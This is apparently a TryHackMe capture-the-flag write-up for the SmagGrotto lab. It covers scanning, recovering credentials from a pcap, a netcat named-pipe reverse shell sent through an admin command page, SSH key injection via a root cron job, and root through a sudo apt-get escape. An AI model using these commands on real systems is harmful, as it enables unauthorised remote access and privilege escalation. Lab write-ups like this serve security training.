# CTF TryHackMe - SmagGrotto

## Nmap
```bash
nmap -sC -sV -oN nmap.log 10.10.141.109
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-26 17:08 CEST
Nmap scan report for 10.10.141.109
Host is up (0.084s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 74:e0:e1:b4:05:85:6a:15:68:7e:16:da:f2:c7:6b:ee (RSA)
|   256 bd:43:62:b9:a1:86:51:36:f8:c7:df:f9:0f:63:8f:a3 (ECDSA)
|_  256 f9:e7:da:07:8f:10:af:97:0b:32:87:c9:32:d7:1b:76 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Smag
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.83 seconds
```

## Gobuster
```bash
gobuster dir -u http://10.10.141.109 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.141.109
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/07/26 17:10:24 Starting gobuster in directory enumeration mode
===============================================================
/mail                 (Status: 301) [Size: 313] [--> http://10.10.141.109/mail/]
```

Go to http://10.10.141.109/mail/

We see email conversation. And we can download a .pcap file.
Let'so do this and analyze this.

## Analyze the .pcap with wireshark
Open the file with wireshark. Clic right on TCP and follow the TCP Stream. I got these informations

```
POST /login.php HTTP/1.1
Host: development.smag.thm
User-Agent: curl/7.47.0
Accept: */*
Content-Length: 39
Content-Type: application/x-www-form-urlencoded

username=helpdesk&password=cH4nG3M3_n0wHTTP/1.1 200 OK
Date: Wed, 03 Jun 2020 18:04:07 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
```

So, let's add development.smag.thm in our /etc/hosts

Once it's done, go to http://development.smag.thm/login.php and login with these cred

```
helpdesk
cH4nG3M3_n0w
```

It's works, now we have the possibility to enter command to administrate the server. But we haven't the return command...

## Try to get a reverse shell

To check if our command works fine. I start a web server on my machine. And from the command control page i launch wget.

```bash
# On my machine
python3 -m http.server
```

```bash
# In the command web page (http://development.smag.thm/admin.php)
wget http://10.9.188.66:8000/test.txt

# The confirmation on my machine
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.141.109 - - [26/Jul/2021 17:30:13] "GET /test.txt HTTP/1.1" 200 -
```

So, let's reverse shell

In http://development.smag.thm/admin.php put your reverse shell and send
```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.9.188.66 9001 >/tmp/f
```
Back to the listener, we are in as www-data

## Using Linpeas to enumeration

Let's do enumeration with linpeas.sh

We can see a crontab (cat /etc/crontab)
```bash
*  *    * * *   root    /bin/cat /opt/.backups/jake_id_rsa.pub.backup > /home/jake/.ssh/authorized_keys
```
We can abuse of this to get jake

## Trying to get access as Jake

As see previously, we can put our ssh public key into /home/jake/.ssh/authorized_keys

First generate an ssh key pair on our machine
```bash
ssh-keygen
```

Secondly add the public key in /opt/.backups/jake_id_rsa.pub.backup
```bash
echo "ssh-rsa AAAAB3NzaC1.." >> /opt/.backups/jake_id_rsa.pub.backup
```

And wait a few minutes that the cronjob is executing.

So we can try to connect though ssh 
```bash
ssh -i jake jake@10.10.11.90
```

It's workssss

## Let's privEsc to get Root

Check the sudo permissions
```bash
sudo -l
Matching Defaults entries for jake on smag:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jake may run the following commands on smag:
    (ALL : ALL) NOPASSWD: /usr/bin/apt-get
```

So, go to gtfobins and search for **apt-get**. Find a way to get root, by typing this command :
```bash
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
```

And we'rrr Root :D
